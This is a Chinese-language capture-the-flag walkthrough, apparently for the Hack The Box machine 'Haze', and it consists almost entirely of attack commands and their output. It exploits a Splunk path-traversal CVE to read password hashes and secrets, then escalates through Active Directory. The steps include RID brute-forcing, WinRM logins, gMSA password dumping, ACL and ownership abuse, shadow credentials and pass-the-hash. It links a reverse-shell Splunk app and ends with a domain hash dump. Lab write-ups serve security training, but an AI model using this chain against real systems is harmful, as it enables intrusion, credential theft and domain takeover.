nmap -A -v -T4 10.10.11.61
https://github.com/Mr-xn/CVE-2024-36991
可以利用这个poc直接使用LFI漏洞
https://github.com/bigb0x/CVE-2024-36991
python3 CVE-2024-36991.py -u http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
https://github.com/HurricaneLabs/splunksecrets.git
splunksecrets splunk-decrypt -S splunk.secret
netexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
Administrator
Guest
krbtgt
paul.taylor
mark.adams
edward.martin
alexander.green
DC01$
Haze-IT-Backup$
netexec winrm haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
evil-winrm -i haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'
https://github.com/micahvandeusen/gMSADumper
python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
aze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebc
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01eda60fd
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95
impacket-owneredit -action write -target 'SUPPORT_SERVICES' -new-owner 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
python3 getTGT.py haze.htb/Haze-IT-Backup$ -hashes ':a70df6599d5eab1502b38f9c1c3fd828'
export KRB5CCNAME=Haze-IT-Backup$.ccache
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u $'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" $'Haze-IT-Backup$'
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" 'Haze-IT-Backup$'
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add shadowCredentials "edward.martin"
openssl pkcs12 -export -out ikun.pfx -inkey AyYeZBye_priv.pem -in AyYeZBye_cert.pem
certipy auth -pfx ikun.pfx -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61 -debug
aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af
evil-winrm -i 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af
https://github.com/0xjpuff/reverse_shell_splunk
ss *
Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::
paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::
edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::
alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::
Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:a70df6599d5eab1502b38f9c1c3fd828:::
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论